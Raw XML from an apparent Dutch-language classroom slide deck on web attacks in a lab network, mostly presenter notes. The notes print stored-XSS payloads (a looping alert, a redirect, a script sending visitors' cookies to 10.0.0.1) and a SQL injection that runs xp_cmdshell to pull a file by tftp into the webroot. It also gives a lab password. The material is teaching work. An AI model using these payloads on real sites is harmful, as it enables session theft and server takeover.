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56" r:id="rId5"/>
    <p:sldId id="352" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="335" r:id="rId8"/>
    <p:sldId id="351" r:id="rId9"/>
    <p:sldId id="339" r:id="rId10"/>
    <p:sldId id="337" r:id="rId11"/>
    <p:sldId id="336" r:id="rId12"/>
    <p:sldId id="340" r:id="rId13"/>
    <p:sldId id="341" r:id="rId14"/>
    <p:sldId id="342" r:id="rId15"/>
    <p:sldId id="343" r:id="rId16"/>
    <p:sldId id="344" r:id="rId17"/>
    <p:sldId id="354" r:id="rId18"/>
    <p:sldId id="345" r:id="rId19"/>
    <p:sldId id="346" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="356" r:id="rId22"/>
    <p:sldId id="357" r:id="rId23"/>
    <p:sldId id="353" r:id="rId24"/>
    <p:sldId id="358" r:id="rId25"/>
    <p:sldId id="359" r:id="rId26"/>
    <p:sldId id="347" r:id="rId27"/>
    <p:sldId id="348" r:id="rId28"/>
    <p:sldId id="350" r:id="rId29"/>
    <p:sldId id="34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CC"/>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85270" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="33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B50AA-5A32-437C-BDF7-60EB31CCB838}" type="datetimeFigureOut">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:t>26-9-2017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B8381-21F2-4384-96C2-A63255ED99F3}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:t>‹nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399500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16B8381-21F2-4384-96C2-A63255ED99F3}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142484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Dit is een normale entry.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng"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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33440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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> slaat het op in de database en bij het laden interpreteert de server het.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng"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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357171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crux is dat je niet meteen de webserver pakt, maar dat je de gebruikers van de website lastig valt.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng"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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70156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Nu functioneert de website in feite niet meer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>=javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>(1==1){alert("looping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>gotcha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>")};}&lt;/script&gt;&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>();&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="1200" b="0" u="none"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363730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r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>=javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>="http://10.0.0.25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>hsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>weblogstart.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>";}&lt;/script&gt;&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>();&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345632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r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>=javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>="http://10.0.0.25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>hsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>weblogstart.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>";}&lt;/script&gt;&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" err="1" smtClean="0"/>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t>();&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng"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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421821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Nu vorm je wel een gevaar voor bezoekers van de website. Je lokt ze naar een</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> hackers malafide website:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng" baseline="0" noProof="0"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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225560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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357862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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3029173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sz="1200" b="0" u="none" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Dit zijn de stappen die gedaan moeten worden. De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>webstie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" u="none" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> in kwestie is er al</a:t>
            </a:r>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398873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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="438714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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2011304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r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" smtClean="0"/>
              <a:t>="http://10.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionsteal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pdo_SS.php?SC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" smtClean="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" smtClean="0"/>
              <a:t>;&lt;/script&gt;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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75748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sz="1200" b="1" u="sng" baseline="0" noProof="0"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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3208676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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2471383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i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>blah’ ; exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 10.0.0.1 GET konfamapes.jpg c:\xampp\htdocs\OranjeWS\konfam.jpg" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" i="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dit commando moet in de login box geplaatst worden en afgevuurd.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114631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webbrowser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> communiceert met de webserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dmv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> het gebruikelijke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>/response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>-Er vindt dataverkeer plaats tussen webserver en database om bv PHP-pagina's te genereren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>-HTML en PHP worden van het filesysteem van de webserver gehaald. (ook CSS en JS trouwens)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>-Wat zou hier nu fout kunnen gaan?</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429371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Hier gaan we laten op in zoomen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32628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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92080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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> browser slaat gewoon alle tekst op in zijn database en haalt het er in een volgende slag weer uit om weer te laten zien als dat gewenst wordt. Mocht er dan HTML of code in staan, voert de browser dit uit.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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29100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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330571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Indien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> iemand alleen wil werken op zijn machine zal zijn netwerk moeten worden aangepast naar "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>". </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL"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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: Mocht je een machine hebben waar om wat voor reden dan ook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Vbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0"/>
              <a:t> niet op kan draaien of geen UTP-aansluiting op zit,  neem  plaats naast iemand bij wie het wel werkt. Password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>P@ssw0rd</a:t>
            </a:r>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260400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De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> zijn niet echt belangrijk. De naam dient alleen om</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> straks een entry te maken in het weblog.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52154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21635"/>
            <a:ext cx="12192000" cy="6036365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>afbeelding toevoegen (optioneel)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
